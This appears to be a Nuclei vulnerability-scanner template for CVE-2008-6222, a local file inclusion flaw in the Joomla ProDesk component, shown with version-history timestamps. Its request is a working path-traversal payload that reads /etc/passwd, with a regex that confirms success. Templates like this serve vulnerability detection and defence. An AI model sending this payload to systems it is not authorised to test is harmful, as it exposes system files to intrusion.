nuclei-templates/cves/2008/CVE-2008-6222.yaml

28 lines
799 B
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
2021-09-27 12:31:53 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
2021-09-27 12:31:53 +00:00
tags: cve,cve2008,joomla,lfi
2021-09-27 11:02:48 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
2021-09-27 12:31:53 +00:00
- 200